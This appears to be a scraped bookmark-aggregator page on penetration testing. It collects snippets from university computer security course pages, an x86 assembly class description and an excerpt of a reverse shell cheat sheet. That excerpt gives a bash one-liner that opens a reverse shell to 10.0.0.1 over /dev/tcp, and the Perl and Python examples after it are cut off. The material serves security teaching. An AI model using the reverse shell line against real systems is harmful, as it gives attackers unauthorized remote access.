background preloader

Penetration Testing and Vulnerability Analysis - Home

Penetration Testing and Vulnerability Analysis - Home

Sec and Infosec Related - MIT SIPB IAP 2009 Activities IAP 2009 Class List: Fri Jan 23, 5:00–7:00pm, 4-231 Single session event Prereq: basic familiarity with C C, love it or hate it, is somewhere at the foundation of most software today. Topics covered may include: function pointers addresses of labels using gotos safely and correctly full for loop notation (i = 0, j = i; i < k; i++; j-=2)... inline asm constraints on arguments clobbers clones volatile and register keywords gcc special arguments/features: alignment constraints on variables packed structs macro notation (pasting, evaluation, sub-blocks) Contact: David Greenberg, W20-557, x3-7788, sipb-iap-advancedc at mit dot edu Fri Jan 23, 3:00–5:00pm, 4-231 Canceled Single session event Prereq: some experience with some UNIX-like system, some programming experience. You are encouraged to bring your laptop. Web: Contact: Geoffrey Thomas, W20-557, x3-7788, sipb-iap-kernel at mit dot edu Wed. Leave Word behind forever!

Cheat Sheet : All Cheat Sheets in one page Software Security - CMU Overview: Poor software design and engineering are the root causes of most security vulnerabilities in deployed systems today. Moreover, with code mobility now commonplace--particularly in the context of web technologies and digital rights management--system designers are increasingly faced with protecting hosts from foreign software and protecting software from foreign hosts running it. This class takes a close look at software as a mechanism for attack, as a tool for protecting resources, and as a resource to be defended. Course Design and Goals: This course first covers state-of-the-practice, and progressively moves toward start-of-the-art in research. Describing and finding common vulnerabilities in programs such as buffer overflows in C programs and SQL injection vulnerabilities against websites. We will then move towards state-of-the-art in research, and cover topics such as model checking, symbolic execution, taint analysis, proof-carrying code, and other topics. Location

IntroX86 Creator: Xeno Kovah @XenoKovah License: Creative Commons: Attribution, Share-Alike ( Class Prerequisites: Must have a basic understanding of the C programming language, as this class will show how C code corresponds to assembly code. Lab Requirements: Requires a Windows system with Visual C++ Express Edition. Class Textbook: “Professional Assembly Language” by Richard Blum. Recommended Class Duration: 2-3 days Creator Available to Teach In-Person Classes: Yes Author Comments: Intel processors have been a major force in personal computing for more than 30 years. 25% of the time will be spent bootstrapping knowledge of fully OS-independent aspects of Intel architecture. 50% will be spent learning Windows tools and analysis of simple programs. This class serves as a foundation for the follow on Intermediate level x86 class. The instructor-led lab work will include: * Boolean logic (and, or, xor, not) * Signed and unsigned multiplication and division

CS155 Computer and Network Security - Stanford Spring 2015 The course covers principles of building secure systems. We give many examples of how things can go wrong if these principles are not followed. Administrative Final Exam Students may take the final at either one of the following two dates: Option 1: (scheduled) Fri., 6/5, 3:30-6:30pm. For remote SCPD students: Please email the TAs with your email address, the email address of your SCPD monitor if you have one, and which day you would like to take the exam. Previous final exams: 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014. Homework Projects Darknet - The Darkside - Ethical Hacking, Penetration Testing & Computer Security

CS 161: Computer Security - UC Berkley Lectures: TuTh, 11AM-12:30PM, 277 Cory Sections: Wed 11:00-12:00: 75 Evans (Mobin) Wed 12:00-1:00: 71 Evans (Matthias) Wed 3:00-4:00: 285 Cory (Devdatta) Wed 4:00-5:00: 285 Cory (Devdatta) Wed 2:00-3:00: 3 Evans (Matthias) Office Hours: Devdatta: Wednesday 1-3 in 711 Soda (alcove) Mobin: Thursday 10-11 in 707 Soda (alcove) Matthias: Thursday 4-6 in 711 Soda (alcove) Vern: Monday 1:30-2:30 in 737 Soda The lecture schedule is subject to change and will be revised as the course progresses. Homeworks: Homeworks will generally be submitted via hardcopy using the drop box labelled "CS 161" in 283 Soda, unless otherwise stated. Homework 0 (due 1/27 electronically); solution. Projects There will be 2 course projects. Grading We will compute grades from a weighted average, as follows: Homeworks: 20% Projects: 30% Midterm: 20% Final exam: 30% Course Policies Contact information: If you have a question, the best way to contact us is via the class Piazzza site. The problem(s) you want to be re-graded. 1.

Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Each of the methods below is aimed to be a one-liner that you can copy/paste. Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Here’s a shorter, feature-free version of the perl-reverse-shell: There’s also an alternative PERL revere shell here. Python This was tested under Linux / Python 2.7:

ZMap · The Internet Scanner - Vimperator

Related: